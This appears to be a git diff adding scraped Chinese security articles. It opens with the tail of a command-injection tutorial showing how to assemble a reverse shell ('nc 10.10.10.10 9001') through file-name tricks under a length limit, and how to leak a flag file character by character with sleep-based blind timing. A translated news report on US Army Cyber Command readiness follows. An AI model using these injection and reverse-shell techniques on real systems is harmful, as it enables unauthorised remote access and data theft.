+![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBeOvxGWV6tS1WU8ReRCum8aCmkFtg1OoZ3OYInhsEAAKbk0LyiaR5icDw/640?wx_fmt=png&from=appmsg "") + + +**3、绕过长度限制反弹shell命令** + +执行shell为 +``` +nc 10.10.10.10 9001 + +``` +``` +#>9001 +#>\ \\ +#>>10\\ +#>10.\\ +#>10.\\ +#>10.\\ +#>c\ \\ +#>\n\\ +#ls -t > zian +#sh zian + +``` + +攻击机监听即可 +## 无回显时间盲注 + +**1、sleep** +``` +sleep 5 理解SQL延时注入 + +``` + +**2、cut -c和awk利用** +``` +cat flag | awk NR==1  | cut -c 1      #获取结果为第1行的第一个字符 +cat flag | awk NR==2  | cut -c 2      #获取结果为第2行第二个字符 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianB0HC8aiaThia3snFzs2pxjKxP6icYsXA1iapbkyiaIPlpT55w4c2eV8qhnxw/640?wx_fmt=png&from=appmsg "") + +**3、if语句:判断命令是否执行** +``` +if [ $(cat flag | awk NR==1 | cut -c 2) == i ];then sleep 2;fi + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianB1TZyicQ7UXJuvAd4qK3oG56StVUVAIRPm34nMOwbP9Jj2JicHKpFb1Hg/640?wx_fmt=png&from=appmsg "") + + + diff --git a/doc/美国陆军网络司令部采取措施提高网络部队战备水平.md b/doc/美国陆军网络司令部采取措施提高网络部队战备水平.md new file mode 100644 index 00000000..ee6b1bb2 --- /dev/null +++ b/doc/美国陆军网络司令部采取措施提高网络部队战备水平.md @@ -0,0 +1,93 @@ +# 美国陆军网络司令部采取措施提高网络部队战备水平 +原创 奇安侦察兵 奇安网情局 2024-11-22 07:28 + +**编者按** + + +美国陆军网络司令部正通过加强培训、提高薪资、扩大招聘渠道等方式提高网络部队的战备水平,以更好地支持美国网络司令部。 + + +美国陆军网络司令部表示,美国陆军一直致力于提高其为美国网络司令部提供的网络任务部队成员的培训水平,以减少部队成员在职指导的要求;作为提高为美国网络司令部提供的部队的战备能力工作的一部分,陆军网络司令部正在尝试提前开展在职能力培训,从而使学员不需要太多或任何额外的训练即可履行工作职责;陆军调整了陆军网络卓越中心的课程,使得课程更加符合美国网络司令部的联合培训要求,以便完成所有1000级任务和尽可能多的2000级任务;作战指挥官希望减少对个人训练的关注,更多地关注集体训练或培养超越基础的熟练程度。除加强培训外,美国陆军还在通过其他措施提高部队战备水平,包括提供特殊津贴和留任奖金、通过“网络例外服役”直接雇用权限扩大招聘渠道等。 + + +美国陆军网络司令部还表示,根据美国网络司令部扩编网络任务部队的需求,陆军网络司令部需要在5年内组建4支网络团队,且已组建2支具备初步作战能力的网络团队;上述团队现在正在支持网络任务部队,标志着陆军网络司令部网络能力提升的一个重要里程碑;陆军网络司令部通过陆军“联合部队总部-网络”执行任务,负责美国北方司令部、非洲司令部和中央司令部的行动;为支持中央司令部负责的中东地区行动,陆军网络司令部网络部队自2023年10月巴以冲突以来“一直很尽快”;陆军网络司令部将继续关注中东地区的动荡局势,向美国网络司令部和中央司令部司令提供尽可能多的选择,以尝试“重置该地区”。 + + +奇安网情局编译有关情况,供读者参考。 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/1o7XLd0wUenQp6fBDYOVDZI29ibk6en6ibkxCk6JibBTc5yFf26S3QTZp5Ac45Y23teW706hric4LHCa8uicL5Ria1Iw/640?wx_fmt=png&from=appmsg "") + + +美国陆军网络司令部正在尝试提前开展培训,以减少网络部队到达其作战单位后对在职指导的需求。 + + +美国陆军一直致力于提高其为美国网络司令部提供的网络任务部队成员的培训水平,以减少他们在职指导的要求。 + + +自美国网络任务部队(各军种负责向网络司令部提供一定数量的人员,供其执行任务)成立以来,已有10多年历史,人员在到达作战单位前,往往无法在学校接受所需的全部培训。相反,数字战士在到达单位后会接受额外的在职培训。这是导致所有美军各军种网络任务部队都存在战备问题的一个因素。 + + +然而,最近,美国网络司令部司令蒂莫西·霍注意到战备水平有了显著提高。 + + +作为提高其为网络司令部提供的部队的战备能力的努力的一部分,美国陆军网络司令部正在尝试提前开展这种训练。 + + +美国陆军网络司令部指挥官玛丽亚·巴雷特表示,“蒂莫西·霍还谈到了其他一些事情,比如提前开展训练,这样更多网络任务部队士兵在走出校门后就不需要太多或任何额外的训练来履行他们的工作职责。不久前,陆军调整了课程,以便完成……所有1000级任务和尽可能多的2000级任务。这根本说不通,因为我们在网络任务部队拥有大多数网络部队,为什么要在校门训练中加入独特的军种要求?首先要满足联合要求。陆军网络卓越中心的课程与网络司令部提出的要求非常吻合。” + + +玛丽亚·巴雷特表示,从各军种接收部队人员的作战指挥官必须平衡作战行动和管理训练工作量,这是一项艰巨的任务。他们不想过多关注个人训练,而是关注各自团队作为一个单位的集体训练。玛丽亚·巴雷特表示,今后,他们希望尽可能少花时间关注作战指挥部的个人训练,而更多地关注集体训练或培养超越基础的熟练程度。 + + +玛丽亚·巴雷特解释称战备就绪并弥补缺陷涉及许多因素,并指出没有“灵丹妙药”。她称,“需要考虑校舍、高级培训、我们要执行的行动数量、需要签署培训的培训师数量。战备就绪的画面中需要考虑很多事情。” + + +玛丽亚·巴雷特表示,美国陆军网络司令部正在继续其他努力,以提高其部队的战备水平,其中一些努力是在前任美国网络司令部司令保罗·中曾根的领导下发起的。 + + +这些措施包括为军人和文职人员提供特殊津贴,以及留任奖金。玛丽亚·巴雷特解释称,“网络例外服役”直接雇用权限也提高了战备水平。 + + +美国陆军还将继续对网络任务部队成员和为这些团队提供情报、火力或任何其他支持的支持人员实施为期5年的服役期。 + + +玛丽亚·巴雷特表示,“如果你的培训流程,或者说在网络领域开展该学科的一些独特方面是一到两年的培训和认证,那么现在我们可以用三到四年的时间来培养这些学科的熟练程度。我认为这将是一个巨大的胜利。” + + +这使得他们在工作角色中具有深厚的熟练程度,蒂莫西·霍曾谈到为部队实现这一点。 + + +玛丽亚·巴雷特表示,“这不仅仅是特定的填充率,或者对人员进行基础培训。我们需要高级和大师级的人才,以便真正面对我们认为未来会面临的挑战。” + + +美国陆军网络司令部正在寻求实施这些准备措施,同时继续组建更多团队。在2022财年预算中,美国网络司令部提议并最终获得批准分阶段增加14个团队,在原有的133个团队的基础上再增加14个团队,这是网络任务部队成立以来首次扩编团队。美国陆军将在5年内组建4支团队,并且已经看到2支这样的团队具备了初步作战能力。据美国陆军网络司令部发言人称,这些团队现在正在支持网络任务部队,标志着该司令部网络能力提升的一个重要里程碑。 + + +玛丽亚·巴雷特表示,“在增加团队规模的同时提高网络任务部队其余部分的战备水平,这对我们来说是一个不小的挑战,我们能够平衡这两点,因为在扩大规模的同时提高战备水平是非常困难的。但从初始作战能力和全面作战能力的角度来看,这些团队的部署进度符合我们的预期。” + + +关于其网络团队的部署,玛丽亚·巴雷特拒绝透露在中东地区行动的具体细节,但她表示,自2023年10月7日哈马斯对以色列的袭击加剧了该地区的紧张局势和冲突以来,他们一直很忙。 + + +美国网络司令部下属部队通过所谓的“联合部队总部-网络”(JFHQ-C)执行任务。美军各军种网络部队指挥官也是JFHQ-C指挥官,负责指定作战司令部的行动。例如,美国陆军JFHQ-C负责美国北方司令部、非洲司令部和中央司令部的行动,后者负责中东地区的行动。 + + +2023年,哈马斯的袭击引发了该地区新一轮的动荡,其中包括以色列对该激进组织及其支持者(如伊朗及其代理人,包括黎巴嫩真主党)的全面攻击。此外,胡塞武装一直在袭击穿越红海的美国军舰和商船。 + + +玛丽亚·巴雷特表示,“我确实认为,我们将继续关注该地区的动荡局势。我们有责任向美国网络司令部司令蒂莫西·霍和美国中央司令部司令迈克尔·库里拉提供尽可能多的选择,以尝试重置该地区。我认为这是首当其冲的。这就是我们试图做的,为他们提供可能缓和局势的选择,使穿越红海更加安全。这就是我们真正专注于做的事情。” + + +网络国防知识库 + +产业发展前哨站 + +开源情报信息源 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1o7XLd0wUenQp6fBDYOVDZI29ibk6en6ibnYWc92nWzk6QpIgVAZpCnbInslaR1SDqgFdrricNI3jvIVteQ0sqRZw/640?wx_fmt=jpeg&from=appmsg "") + + +奇安网情局 + diff --git a/doc/躺平预告!漏洞挖掘的赚钱姿势.md b/doc/躺平预告!漏洞挖掘的赚钱姿势.md new file mode 100644 index 00000000..f1b33375 --- /dev/null +++ b/doc/躺平预告!漏洞挖掘的赚钱姿势.md @@ -0,0 +1,5 @@ +# 躺平预告!漏洞挖掘的赚钱姿势 + 蚁景网安 2024-11-22 08:30 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/TL4Y9UAcgrsatJVuAnaH3brr9z29ISYzy50oZMKZs2mbWmiclhC5zS4uASS4QLa7CWgO3Sbr8n0g0T2BNrcTVZw/640?wx_fmt=jpeg&from=appmsg "") +